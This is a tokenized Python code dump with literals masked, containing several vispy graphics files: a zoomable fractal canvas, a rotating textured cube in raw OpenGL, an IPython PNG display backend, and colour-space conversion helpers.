pixel_to_coords ( float ( x0 ) , float ( y0 ) ) <EOL> X1 , Y1 = self . pixel_to_coords ( float ( x1 ) , float ( y1 ) ) <EOL> self . translate_center ( X1 - X0 , Y1 - Y0 ) <EOL> self . update ( ) <EOL> def translate_center ( self , dx , dy ) : <EOL> """<STR_LIT>""" <EOL> center = self . center <EOL> center [ <NUM_LIT:0> ] -= dx <EOL> center [ <NUM_LIT:1> ] -= dy <EOL> center [ <NUM_LIT:0> ] = min ( max ( center [ <NUM_LIT:0> ] , self . bounds [ <NUM_LIT:0> ] ) , self . bounds [ <NUM_LIT:1> ] ) <EOL> center [ <NUM_LIT:1> ] = min ( max ( center [ <NUM_LIT:1> ] , self . bounds [ <NUM_LIT:0> ] ) , self . bounds [ <NUM_LIT:1> ] ) <EOL> self . center = center <EOL> center_x = set_emulated_double ( center [ <NUM_LIT:0> ] ) <EOL> center_y = set_emulated_double ( center [ <NUM_LIT:1> ] ) <EOL> self . program [ "<STR_LIT>" ] = center_x <EOL> self . program [ "<STR_LIT>" ] = center_y <EOL> def pixel_to_coords ( self , x , y ) : <EOL> """<STR_LIT>""" <EOL> rx , ry = self . size <EOL> nx = ( x / rx - <NUM_LIT:0.5> ) * self . scale + self . center [ <NUM_LIT:0> ] <EOL> ny = ( ( ry - y ) / ry - <NUM_LIT:0.5> ) * self . scale + self . center [ <NUM_LIT:1> ] <EOL> return [ nx , ny ] <EOL> def on_mouse_wheel ( self , event ) : <EOL> """<STR_LIT>""" <EOL> delta = event . delta [ <NUM_LIT:1> ] <EOL> if delta > <NUM_LIT:0> : <EOL> factor = <NUM_LIT> <EOL> elif delta < <NUM_LIT:0> : <EOL> factor = <NUM_LIT:1> / <NUM_LIT> <EOL> for _ in range ( int ( abs ( delta ) ) ) : <EOL> self . zoom ( factor , event . pos ) <EOL> self . update ( ) <EOL> def on_key_press ( self , event ) : <EOL> """<STR_LIT>""" <EOL> if event . text == '<STR_LIT:+>' or event . text == '<STR_LIT:=>' : <EOL> self . zoom ( <NUM_LIT> ) <EOL> elif event . text == '<STR_LIT:->' : <EOL> self . zoom ( <NUM_LIT:1> / <NUM_LIT> ) <EOL> self . 
update ( ) <EOL> def zoom ( self , factor , mouse_coords = None ) : <EOL> """<STR_LIT>""" <EOL> if mouse_coords is not None : <EOL> x , y = float ( mouse_coords [ <NUM_LIT:0> ] ) , float ( mouse_coords [ <NUM_LIT:1> ] ) <EOL> x0 , y0 = self . pixel_to_coords ( x , y ) <EOL> self . scale *= factor <EOL> self . scale = max ( min ( self . scale , self . max_scale ) , self . min_scale ) <EOL> self . program [ "<STR_LIT>" ] = set_emulated_double ( self . scale ) <EOL> if mouse_coords is not None : <EOL> x1 , y1 = self . pixel_to_coords ( x , y ) <EOL> self . translate_center ( x1 - x0 , y1 - y0 ) <EOL> def set_emulated_double ( number ) : <EOL> """<STR_LIT>""" <EOL> double = np . array ( [ number , <NUM_LIT:0> ] , dtype = np . float32 ) <EOL> double [ <NUM_LIT:1> ] = number - double [ <NUM_LIT:0> ] <EOL> return double <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> canvas = Canvas ( size = ( <NUM_LIT> , <NUM_LIT> ) , keys = '<STR_LIT>' ) <EOL> app . run ( ) </s>
<s> import math <EOL> import numpy as np <EOL> from vispy import app <EOL> from vispy . gloo import gl <EOL> def checkerboard ( grid_num = <NUM_LIT:8> , grid_size = <NUM_LIT:32> ) : <EOL> row_even = grid_num // <NUM_LIT:2> * [ <NUM_LIT:0> , <NUM_LIT:1> ] <EOL> row_odd = grid_num // <NUM_LIT:2> * [ <NUM_LIT:1> , <NUM_LIT:0> ] <EOL> Z = np . row_stack ( grid_num // <NUM_LIT:2> * ( row_even , row_odd ) ) . astype ( np . uint8 ) <EOL> return <NUM_LIT:255> * Z . repeat ( grid_size , axis = <NUM_LIT:0> ) . repeat ( grid_size , axis = <NUM_LIT:1> ) <EOL> def rotate ( M , angle , x , y , z , point = None ) : <EOL> angle = math . pi * angle / <NUM_LIT> <EOL> c , s = math . cos ( angle ) , math . sin ( angle ) <EOL> n = math . sqrt ( x * x + y * y + z * z ) <EOL> x /= n <EOL> y /= n <EOL> z /= n <EOL> cx , cy , cz = ( <NUM_LIT:1> - c ) * x , ( <NUM_LIT:1> - c ) * y , ( <NUM_LIT:1> - c ) * z <EOL> R = np . array ( [ [ cx * x + c , cy * x - z * s , cz * x + y * s , <NUM_LIT:0> ] , <EOL> [ cx * y + z * s , cy * y + c , cz * y - x * s , <NUM_LIT:0> ] , <EOL> [ cx * z - y * s , cy * z + x * s , cz * z + c , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> ] ] , dtype = M . dtype ) . T <EOL> M [ ... ] = np . dot ( M , R ) <EOL> return M <EOL> def translate ( M , x , y = None , z = None ) : <EOL> y = x if y is None else y <EOL> z = x if z is None else z <EOL> T = np . array ( [ [ <NUM_LIT:1.0> , <NUM_LIT:0.0> , <NUM_LIT:0.0> , x ] , <EOL> [ <NUM_LIT:0.0> , <NUM_LIT:1.0> , <NUM_LIT:0.0> , y ] , <EOL> [ <NUM_LIT:0.0> , <NUM_LIT:0.0> , <NUM_LIT:1.0> , z ] , <EOL> [ <NUM_LIT:0.0> , <NUM_LIT:0.0> , <NUM_LIT:0.0> , <NUM_LIT:1.0> ] ] , dtype = M . dtype ) . T <EOL> M [ ... ] = np . dot ( M , T ) <EOL> return M <EOL> def frustum ( left , right , bottom , top , znear , zfar ) : <EOL> M = np . zeros ( ( <NUM_LIT:4> , <NUM_LIT:4> ) , dtype = np . 
float32 ) <EOL> M [ <NUM_LIT:0> , <NUM_LIT:0> ] = + <NUM_LIT> * znear / ( right - left ) <EOL> M [ <NUM_LIT:2> , <NUM_LIT:0> ] = ( right + left ) / ( right - left ) <EOL> M [ <NUM_LIT:1> , <NUM_LIT:1> ] = + <NUM_LIT> * znear / ( top - bottom ) <EOL> M [ <NUM_LIT:3> , <NUM_LIT:1> ] = ( top + bottom ) / ( top - bottom ) <EOL> M [ <NUM_LIT:2> , <NUM_LIT:2> ] = - ( zfar + znear ) / ( zfar - znear ) <EOL> M [ <NUM_LIT:3> , <NUM_LIT:2> ] = - <NUM_LIT> * znear * zfar / ( zfar - znear ) <EOL> M [ <NUM_LIT:2> , <NUM_LIT:3> ] = - <NUM_LIT:1.0> <EOL> return M <EOL> def perspective ( fovy , aspect , znear , zfar ) : <EOL> h = math . tan ( fovy / <NUM_LIT> * math . pi ) * znear <EOL> w = h * aspect <EOL> return frustum ( - w , w , - h , h , znear , zfar ) <EOL> def makecube ( ) : <EOL> """<STR_LIT>""" <EOL> vtype = [ ( '<STR_LIT>' , np . float32 , <NUM_LIT:3> ) , <EOL> ( '<STR_LIT>' , np . float32 , <NUM_LIT:2> ) ] <EOL> itype = np . uint32 <EOL> p = np . array ( [ [ <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> ] , [ - <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> ] , [ - <NUM_LIT:1> , - <NUM_LIT:1> , <NUM_LIT:1> ] , [ <NUM_LIT:1> , - <NUM_LIT:1> , <NUM_LIT:1> ] , <EOL> [ <NUM_LIT:1> , - <NUM_LIT:1> , - <NUM_LIT:1> ] , [ <NUM_LIT:1> , <NUM_LIT:1> , - <NUM_LIT:1> ] , [ - <NUM_LIT:1> , <NUM_LIT:1> , - <NUM_LIT:1> ] , [ - <NUM_LIT:1> , - <NUM_LIT:1> , - <NUM_LIT:1> ] ] ) <EOL> t = np . 
array ( [ [ <NUM_LIT:0> , <NUM_LIT:0> ] , [ <NUM_LIT:0> , <NUM_LIT:1> ] , [ <NUM_LIT:1> , <NUM_LIT:1> ] , [ <NUM_LIT:1> , <NUM_LIT:0> ] ] ) <EOL> faces_p = [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:0> , <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:5> , <NUM_LIT:0> , <NUM_LIT:5> , <NUM_LIT:6> , <EOL> <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:6> , <NUM_LIT:7> , <NUM_LIT:2> , <NUM_LIT:7> , <NUM_LIT:4> , <NUM_LIT:3> , <NUM_LIT:2> , <NUM_LIT:4> , <NUM_LIT:7> , <NUM_LIT:6> , <NUM_LIT:5> ] <EOL> faces_t = [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> , <EOL> <NUM_LIT:3> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ] <EOL> vertices = np . zeros ( <NUM_LIT> , vtype ) <EOL> vertices [ '<STR_LIT>' ] = p [ faces_p ] <EOL> vertices [ '<STR_LIT>' ] = t [ faces_t ] <EOL> indices = np . resize ( <EOL> np . array ( [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:0> , <NUM_LIT:2> , <NUM_LIT:3> ] , dtype = itype ) , <NUM_LIT:6> * ( <NUM_LIT:2> * <NUM_LIT:3> ) ) <EOL> indices += np . repeat ( <NUM_LIT:4> * np . arange ( <NUM_LIT:6> ) , <NUM_LIT:6> ) . astype ( np . uint32 ) <EOL> return vertices , indices <EOL> cube_vertex = """<STR_LIT>""" <EOL> cube_fragment = """<STR_LIT>""" <EOL> class Canvas ( app . Canvas ) : <EOL> def __init__ ( self ) : <EOL> app . Canvas . __init__ ( self , size = ( <NUM_LIT> , <NUM_LIT> ) , <EOL> title = '<STR_LIT>' , <EOL> keys = '<STR_LIT>' ) <EOL> def on_initialize ( self , event ) : <EOL> self . cube = gl . glCreateProgram ( ) <EOL> vertex = gl . glCreateShader ( gl . GL_VERTEX_SHADER ) <EOL> fragment = gl . glCreateShader ( gl . GL_FRAGMENT_SHADER ) <EOL> gl . glShaderSource ( vertex , cube_vertex ) <EOL> gl . glShaderSource ( fragment , cube_fragment ) <EOL> gl . glCompileShader ( vertex ) <EOL> gl . 
# NOTE(review): fragment of a vispy "rotating textured cube" GL example; the
# enclosing Canvas class and the method these first statements belong to
# (presumably on_initialize) start before this excerpt -- confirm upstream.
glCompileShader ( fragment ) <EOL>
# Link the shader program, then release the now-linked shader objects.
gl . glAttachShader ( self . cube , vertex ) <EOL>
gl . glAttachShader ( self . cube , fragment ) <EOL>
gl . glLinkProgram ( self . cube ) <EOL>
gl . glDetachShader ( self . cube , vertex ) <EOL>
gl . glDetachShader ( self . cube , fragment ) <EOL>
gl . glUseProgram ( self . cube ) <EOL>
# Upload cube geometry: vertex buffer + element (index) buffer.
vcube_data , self . icube_data = makecube ( ) <EOL>
vcube = gl . glCreateBuffer ( ) <EOL>
gl . glBindBuffer ( gl . GL_ARRAY_BUFFER , vcube ) <EOL>
gl . glBufferData ( gl . GL_ARRAY_BUFFER , vcube_data , gl . GL_STATIC_DRAW ) <EOL>
icube = gl . glCreateBuffer ( ) <EOL>
gl . glBindBuffer ( gl . GL_ELEMENT_ARRAY_BUFFER , icube ) <EOL>
gl . glBufferData ( gl . GL_ELEMENT_ARRAY_BUFFER , <EOL> self . icube_data , gl . GL_STATIC_DRAW ) <EOL>
# Describe the interleaved vertex layout: a 3-float attribute at offset 0,
# then a 2-float attribute at the itemsize of the first dtype field.
stride = vcube_data . strides [ <NUM_LIT:0> ] <EOL>
offset = <NUM_LIT:0> <EOL>
loc = gl . glGetAttribLocation ( self . cube , "<STR_LIT>" ) <EOL>
gl . glEnableVertexAttribArray ( loc ) <EOL>
gl . glVertexAttribPointer ( loc , <NUM_LIT:3> , gl . GL_FLOAT , False , stride , offset ) <EOL>
offset = vcube_data . dtype [ "<STR_LIT>" ] . itemsize <EOL>
loc = gl . glGetAttribLocation ( self . cube , "<STR_LIT>" ) <EOL>
gl . glEnableVertexAttribArray ( loc ) <EOL>
gl . glVertexAttribPointer ( loc , <NUM_LIT:2> , gl . GL_FLOAT , False , stride , offset ) <EOL>
# Create a clamped, linearly-filtered luminance texture and fill it from
# the array returned by checkerboard().
crate = checkerboard ( ) <EOL>
texture = gl . glCreateTexture ( ) <EOL>
gl . glTexParameterf ( gl . GL_TEXTURE_2D , gl . GL_TEXTURE_MIN_FILTER , <EOL> gl . GL_LINEAR ) <EOL>
gl . glTexParameterf ( gl . GL_TEXTURE_2D , gl . GL_TEXTURE_MAG_FILTER , <EOL> gl . GL_LINEAR ) <EOL>
gl . glTexParameterf ( gl . GL_TEXTURE_2D , gl . GL_TEXTURE_WRAP_S , <EOL> gl . GL_CLAMP_TO_EDGE ) <EOL>
gl . glTexParameterf ( gl . GL_TEXTURE_2D , gl . GL_TEXTURE_WRAP_T , <EOL> gl . GL_CLAMP_TO_EDGE ) <EOL>
gl . glTexImage2D ( gl . GL_TEXTURE_2D , <NUM_LIT:0> , gl . GL_LUMINANCE , gl . GL_LUMINANCE , <EOL> gl . GL_UNSIGNED_BYTE , crate . shape [ : <NUM_LIT:2> ] ) <EOL>
gl . glTexSubImage2D ( gl . GL_TEXTURE_2D , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , gl . GL_LUMINANCE , <EOL> gl . GL_UNSIGNED_BYTE , crate ) <EOL>
loc = gl . glGetUniformLocation ( self . cube , "<STR_LIT>" ) <EOL>
# NOTE(review): the texture *handle* is passed to glUniform1i -- sampler
# uniforms normally take a texture-unit index; confirm against original.
gl . glUniform1i ( loc , texture ) <EOL>
gl . glBindTexture ( gl . GL_TEXTURE_2D , <NUM_LIT:0> ) <EOL>
# Set up model/view/projection matrices and the initial rotation angles.
view = np . eye ( <NUM_LIT:4> , dtype = np . float32 ) <EOL>
model = np . eye ( <NUM_LIT:4> , dtype = np . float32 ) <EOL>
projection = np . eye ( <NUM_LIT:4> , dtype = np . float32 ) <EOL>
translate ( view , <NUM_LIT:0> , <NUM_LIT:0> , - <NUM_LIT:7> ) <EOL>
self . phi , self . theta = <NUM_LIT> , <NUM_LIT:20> <EOL>
rotate ( model , self . theta , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> ) <EOL>
rotate ( model , self . phi , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:0> ) <EOL>
loc = gl . glGetUniformLocation ( self . cube , "<STR_LIT>" ) <EOL>
gl . glUniformMatrix4fv ( loc , <NUM_LIT:1> , False , model ) <EOL>
loc = gl . glGetUniformLocation ( self . cube , "<STR_LIT>" ) <EOL>
gl . glUniformMatrix4fv ( loc , <NUM_LIT:1> , False , view ) <EOL>
loc = gl . glGetUniformLocation ( self . cube , "<STR_LIT>" ) <EOL>
gl . glUniformMatrix4fv ( loc , <NUM_LIT:1> , False , projection ) <EOL>
gl . glClearColor ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL>
gl . glEnable ( gl . GL_DEPTH_TEST ) <EOL>
self . _resize ( * ( self . size + self . physical_size ) ) <EOL>
# Start the animation timer; on_timer re-rotates the model each tick.
self . timer = app . Timer ( '<STR_LIT>' , self . on_timer , start = True ) <EOL>
# Clear color+depth and draw the indexed cube triangles.
def on_draw ( self , event ) : <EOL>
gl . glClear ( gl . GL_COLOR_BUFFER_BIT | gl . GL_DEPTH_BUFFER_BIT ) <EOL>
gl . glDrawElements ( gl . GL_TRIANGLES , self . icube_data . size , <EOL> gl . GL_UNSIGNED_INT , None ) <EOL>
def on_resize ( self , event ) : <EOL>
self . _resize ( * ( event . size + event . physical_size ) ) <EOL>
# Update the GL viewport (physical pixels) and the perspective projection
# (logical aspect ratio) after a size change.
def _resize ( self , width , height , physical_width , physical_height ) : <EOL>
gl . glViewport ( <NUM_LIT:0> , <NUM_LIT:0> , physical_width , physical_height ) <EOL>
projection = perspective ( <NUM_LIT> , width / float ( height ) , <NUM_LIT> , <NUM_LIT> ) <EOL>
loc = gl . glGetUniformLocation ( self . cube , "<STR_LIT>" ) <EOL>
gl . glUniformMatrix4fv ( loc , <NUM_LIT:1> , False , projection ) <EOL>
# Advance the rotation angles, upload a fresh model matrix, and redraw.
def on_timer ( self , event ) : <EOL>
self . theta += <NUM_LIT> <EOL>
self . phi += <NUM_LIT> <EOL>
model = np . eye ( <NUM_LIT:4> , dtype = np . float32 ) <EOL>
rotate ( model , self . theta , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> ) <EOL>
rotate ( model , self . phi , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:0> ) <EOL>
loc = gl . glGetUniformLocation ( self . cube , "<STR_LIT>" ) <EOL>
gl . glUniformMatrix4fv ( loc , <NUM_LIT:1> , False , model ) <EOL>
self . update ( ) <EOL>
# Script entry point: create the canvas and run the event loop.
if __name__ == '<STR_LIT:__main__>' : <EOL>
c = Canvas ( ) <EOL>
c . show ( ) <EOL>
app . run ( ) </s>
<s> """<STR_LIT>""" <EOL>
# Vispy app backend that renders through a real (proxied) backend and then
# publishes the captured frame as a PNG via IPython's display machinery.
from __future__ import division <EOL>
from . . base import BaseApplicationBackend , BaseCanvasBackend <EOL>
from . . import Application , Canvas <EOL>
from ... util import logger <EOL>
from ... gloo . util import _screenshot <EOL>
from ... io import _make_png <EOL>
from base64 import b64encode <EOL>
# Capabilities advertised by this backend (no vsync/fullscreen/parenting).
capability = dict ( <EOL> title = True , <EOL> size = True , <EOL> position = True , <EOL> show = True , <EOL> vsync = False , <EOL> resizable = True , <EOL> decorate = False , <EOL> fullscreen = False , <EOL> context = True , <EOL> multi_window = True , <EOL> scroll = True , <EOL> parent = False , <EOL> always_on_top = False , <EOL> ) <EOL>
# Delegate GL config selection to the proxied backend module.
def _set_config ( c ) : <EOL>
_app . backend_module . _set_config ( c ) <EOL>
# Availability probe: this backend needs both a usable default Application
# and IPython's display_png; on failure, record the reason in `why_not`.
try : <EOL>
_app = Application ( '<STR_LIT:default>' ) <EOL>
except Exception : <EOL>
_msg = '<STR_LIT>' <EOL>
available , testable , why_not , which = False , False , _msg , None <EOL>
else : <EOL>
try : <EOL>
from IPython . display import display_png <EOL>
except Exception as exp : <EOL>
available , testable , why_not , which = False , False , str ( exp ) , None <EOL>
else : <EOL>
available , testable , why_not = True , False , None <EOL>
which = _app . backend_module . which <EOL>
KEYMAP = _app . backend_module . KEYMAP <EOL>
# Thin wrapper: every call is forwarded to the proxied backend's native
# application object; _vispy_run is deliberately a no-op.
class ApplicationBackend ( BaseApplicationBackend ) : <EOL>
def __init__ ( self ) : <EOL>
BaseApplicationBackend . __init__ ( self ) <EOL>
self . _backend2 = _app . _backend <EOL>
def _vispy_get_backend_name ( self ) : <EOL>
realname = self . _backend2 . _vispy_get_backend_name ( ) <EOL>
return '<STR_LIT>' % realname <EOL>
def _vispy_process_events ( self ) : <EOL>
return self . _backend2 . _vispy_process_events ( ) <EOL>
def _vispy_run ( self ) : <EOL>
pass <EOL>
def _vispy_quit ( self ) : <EOL>
return self . _backend2 . _vispy_quit ( ) <EOL>
def _vispy_get_native_app ( self ) : <EOL>
return self . _backend2 . _vispy_get_native_app ( ) <EOL>
# Canvas that draws via a real backend canvas (`_backend2`) and, on show,
# emits the captured image with display_png.
class CanvasBackend ( BaseCanvasBackend ) : <EOL>
def __init__ ( self , * args , ** kwargs ) : <EOL>
BaseCanvasBackend . __init__ ( self , * args ) <EOL>
self . _initialized = False <EOL>
# Reject kwargs this backend cannot honour (keys masked in this copy;
# presumably show/parent/fullscreen-style options -- TODO confirm).
if not kwargs [ '<STR_LIT>' ] : <EOL>
raise RuntimeError ( '<STR_LIT>' ) <EOL>
if kwargs [ '<STR_LIT>' ] : <EOL>
raise RuntimeError ( '<STR_LIT>' ) <EOL>
if kwargs [ '<STR_LIT>' ] : <EOL>
raise RuntimeError ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL>
kwargs . pop ( '<STR_LIT>' , None ) <EOL>
kwargs [ '<STR_LIT>' ] = False <EOL>
# Build the real canvas on the proxied application and mirror its
# draw/resize events onto this backend.
canvas = Canvas ( app = _app , ** kwargs ) <EOL>
self . _backend2 = canvas . native <EOL>
canvas . events . draw . connect ( self . _on_draw ) <EOL>
canvas . events . resize . connect ( self . _on_resize ) <EOL>
canvas . show ( ) <EOL>
self . _im = "<STR_LIT>" <EOL>
def _vispy_warmup ( self ) : <EOL>
return self . _backend2 . _vispy_warmup ( ) <EOL>
def _vispy_set_current ( self ) : <EOL>
return self . _backend2 . _vispy_set_current ( ) <EOL>
def _vispy_swap_buffers ( self ) : <EOL>
return self . _backend2 . _vispy_swap_buffers ( ) <EOL>
def _vispy_set_title ( self , title ) : <EOL>
return self . _backend2 . _vispy_set_title ( title ) <EOL>
def _vispy_set_size ( self , w , h ) : <EOL>
return self . _backend2 . _vispy_set_size ( w , h ) <EOL>
def _vispy_set_position ( self , x , y ) : <EOL>
# Window position has no meaning for an inline notebook image.
logger . warn ( '<STR_LIT>' ) <EOL>
def _vispy_set_visible ( self , visible ) : <EOL>
if not visible : <EOL>
logger . warn ( '<STR_LIT>' ) <EOL>
else : <EOL>
# "Showing" = draw once, close the off-screen canvas, then emit
# the captured image stored in self._im.
self . _vispy_update ( ) <EOL>
self . _vispy_canvas . app . process_events ( ) <EOL>
self . _vispy_close ( ) <EOL>
display_png ( self . _im , raw = True ) <EOL>
def _vispy_update ( self ) : <EOL>
return self . _backend2 . _vispy_update ( ) <EOL>
def _vispy_close ( self ) : <EOL>
return self . _backend2 . _vispy_close ( ) <EOL>
def _vispy_get_position ( self ) : <EOL>
return <NUM_LIT:0> , <NUM_LIT:0> <EOL>
def _vispy_get_size ( self ) : <EOL>
return self . _backend2 . _vispy_get_size ( ) <EOL>
# Forward the real backend's size to vispy's resize event.
def _on_resize ( self , event = None ) : <EOL>
if self . _vispy_canvas is None : <EOL>
return <EOL>
size = self . _backend2 . _vispy_get_size ( ) <EOL>
self . _vispy_canvas . events . resize ( size = size ) <EOL>
# Fire initialize on first draw, then draw and snapshot the frame.
def _on_draw ( self , event = None ) : <EOL>
if self . _vispy_canvas is None : <EOL>
return <EOL>
if not self . _initialized : <EOL>
self . _initialized = True <EOL>
self . _vispy_canvas . events . initialize ( ) <EOL>
self . _on_resize ( ) <EOL>
self . _vispy_canvas . set_current ( ) <EOL>
self . _vispy_canvas . events . draw ( region = None ) <EOL>
self . _gen_png ( ) <EOL>
# Grab the framebuffer, PNG-encode it, and keep it base64-encoded.
def _gen_png ( self ) : <EOL>
screenshot = _screenshot ( ) <EOL>
png = _make_png ( screenshot ) <EOL>
self . _im = b64encode ( png ) </s>
<s> from __future__ import division <EOL> import numpy as np <EOL> from . . ext . six import string_types <EOL> def _check_color_dim ( val ) : <EOL> """<STR_LIT>""" <EOL> val = np . atleast_2d ( val ) <EOL> if val . shape [ <NUM_LIT:1> ] not in ( <NUM_LIT:3> , <NUM_LIT:4> ) : <EOL> raise RuntimeError ( '<STR_LIT>' ) <EOL> return val , val . shape [ <NUM_LIT:1> ] <EOL> def _hex_to_rgba ( hexs ) : <EOL> """<STR_LIT>""" <EOL> hexs = np . atleast_1d ( np . array ( hexs , '<STR_LIT>' ) ) <EOL> out = np . ones ( ( len ( hexs ) , <NUM_LIT:4> ) , np . float32 ) <EOL> for hi , h in enumerate ( hexs ) : <EOL> assert isinstance ( h , string_types ) <EOL> off = <NUM_LIT:1> if h [ <NUM_LIT:0> ] == '<STR_LIT:#>' else <NUM_LIT:0> <EOL> assert len ( h ) in ( <NUM_LIT:6> + off , <NUM_LIT:8> + off ) <EOL> e = ( len ( h ) - off ) // <NUM_LIT:2> <EOL> out [ hi , : e ] = [ int ( h [ i : i + <NUM_LIT:2> ] , <NUM_LIT:16> ) / <NUM_LIT> <EOL> for i in range ( off , len ( h ) , <NUM_LIT:2> ) ] <EOL> return out <EOL> def _rgb_to_hex ( rgbs ) : <EOL> """<STR_LIT>""" <EOL> rgbs , n_dim = _check_color_dim ( rgbs ) <EOL> return np . array ( [ '<STR_LIT>' % tuple ( ( <NUM_LIT:255> * rgb [ : <NUM_LIT:3> ] ) . astype ( np . uint8 ) ) <EOL> for rgb in rgbs ] , '<STR_LIT>' ) <EOL> def _rgb_to_hsv ( rgbs ) : <EOL> """<STR_LIT>""" <EOL> rgbs , n_dim = _check_color_dim ( rgbs ) <EOL> hsvs = list ( ) <EOL> for rgb in rgbs : <EOL> rgb = rgb [ : <NUM_LIT:3> ] <EOL> idx = np . argmax ( rgb ) <EOL> val = rgb [ idx ] <EOL> c = val - np . 
min ( rgb ) <EOL> if c == <NUM_LIT:0> : <EOL> hue = <NUM_LIT:0> <EOL> sat = <NUM_LIT:0> <EOL> else : <EOL> if idx == <NUM_LIT:0> : <EOL> hue = ( ( rgb [ <NUM_LIT:1> ] - rgb [ <NUM_LIT:2> ] ) / c ) % <NUM_LIT:6> <EOL> elif idx == <NUM_LIT:1> : <EOL> hue = ( rgb [ <NUM_LIT:2> ] - rgb [ <NUM_LIT:0> ] ) / c + <NUM_LIT:2> <EOL> else : <EOL> hue = ( rgb [ <NUM_LIT:0> ] - rgb [ <NUM_LIT:1> ] ) / c + <NUM_LIT:4> <EOL> hue *= <NUM_LIT> <EOL> sat = c / val <EOL> hsv = [ hue , sat , val ] <EOL> hsvs . append ( hsv ) <EOL> hsvs = np . array ( hsvs , dtype = np . float32 ) <EOL> if n_dim == <NUM_LIT:4> : <EOL> hsvs = np . concatenate ( ( hsvs , rgbs [ : , <NUM_LIT:3> ] ) , axis = <NUM_LIT:1> ) <EOL> return hsvs <EOL> def _hsv_to_rgb ( hsvs ) : <EOL> """<STR_LIT>""" <EOL> hsvs , n_dim = _check_color_dim ( hsvs ) <EOL> rgbs = list ( ) <EOL> for hsv in hsvs : <EOL> c = hsv [ <NUM_LIT:1> ] * hsv [ <NUM_LIT:2> ] <EOL> m = hsv [ <NUM_LIT:2> ] - c <EOL> hp = hsv [ <NUM_LIT:0> ] / <NUM_LIT> <EOL> x = c * ( <NUM_LIT:1> - abs ( hp % <NUM_LIT:2> - <NUM_LIT:1> ) ) <EOL> if <NUM_LIT:0> <= hp < <NUM_LIT:1> : <EOL> r , g , b = c , x , <NUM_LIT:0> <EOL> elif hp < <NUM_LIT:2> : <EOL> r , g , b = x , c , <NUM_LIT:0> <EOL> elif hp < <NUM_LIT:3> : <EOL> r , g , b = <NUM_LIT:0> , c , x <EOL> elif hp < <NUM_LIT:4> : <EOL> r , g , b = <NUM_LIT:0> , x , c <EOL> elif hp < <NUM_LIT:5> : <EOL> r , g , b = x , <NUM_LIT:0> , c <EOL> else : <EOL> r , g , b = c , <NUM_LIT:0> , x <EOL> rgb = [ r + m , g + m , b + m ] <EOL> rgbs . append ( rgb ) <EOL> rgbs = np . array ( rgbs , dtype = np . float32 ) <EOL> if n_dim == <NUM_LIT:4> : <EOL> rgbs = np . concatenate ( ( rgbs , hsvs [ : , <NUM_LIT:3> ] ) , axis = <NUM_LIT:1> ) <EOL> return rgbs <EOL> _rgb2xyz_norm = np . array ( [ [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ] ) <EOL> _xyz2rgb_norm = np . 
array ( [ [ <NUM_LIT> , - <NUM_LIT> , - <NUM_LIT> ] , <EOL> [ - <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> ] ] ) <EOL> def _rgb_to_lab ( rgbs ) : <EOL> rgbs , n_dim = _check_color_dim ( rgbs ) <EOL> xyz = rgbs [ : , : <NUM_LIT:3> ] . copy ( ) <EOL> over = xyz > <NUM_LIT> <EOL> xyz [ over ] = ( ( xyz [ over ] + <NUM_LIT> ) / <NUM_LIT> ) ** <NUM_LIT> <EOL> xyz [ ~ over ] /= <NUM_LIT> <EOL> xyz = np . dot ( xyz , _rgb2xyz_norm ) <EOL> over = xyz > <NUM_LIT> <EOL> xyz [ over ] = xyz [ over ] ** ( <NUM_LIT:1.> / <NUM_LIT> ) <EOL> xyz [ ~ over ] = <NUM_LIT> * xyz [ ~ over ] + <NUM_LIT> <EOL> L = ( <NUM_LIT> * xyz [ : , <NUM_LIT:1> ] ) - <NUM_LIT:16> <EOL> a = <NUM_LIT> * ( xyz [ : , <NUM_LIT:0> ] - xyz [ : , <NUM_LIT:1> ] ) <EOL> b = <NUM_LIT:200> * ( xyz [ : , <NUM_LIT:1> ] - xyz [ : , <NUM_LIT:2> ] ) <EOL> labs = [ L , a , b ] <EOL> if n_dim == <NUM_LIT:4> : <EOL> labs . append ( np . atleast1d ( rgbs [ : , <NUM_LIT:3> ] ) ) <EOL> labs = np . array ( labs , order = '<STR_LIT:F>' ) . T <EOL> return labs <EOL> def _lab_to_rgb ( labs ) : <EOL> """<STR_LIT>""" <EOL> labs , n_dim = _check_color_dim ( labs ) <EOL> y = ( labs [ : , <NUM_LIT:0> ] + <NUM_LIT> ) / <NUM_LIT> <EOL> x = ( labs [ : , <NUM_LIT:1> ] / <NUM_LIT> ) + y <EOL> z = y - ( labs [ : , <NUM_LIT:2> ] / <NUM_LIT> ) <EOL> xyz = np . concatenate ( ( [ x ] , [ y ] , [ z ] ) ) <EOL> over = xyz > <NUM_LIT> <EOL> xyz [ over ] = xyz [ over ] ** <NUM_LIT> <EOL> 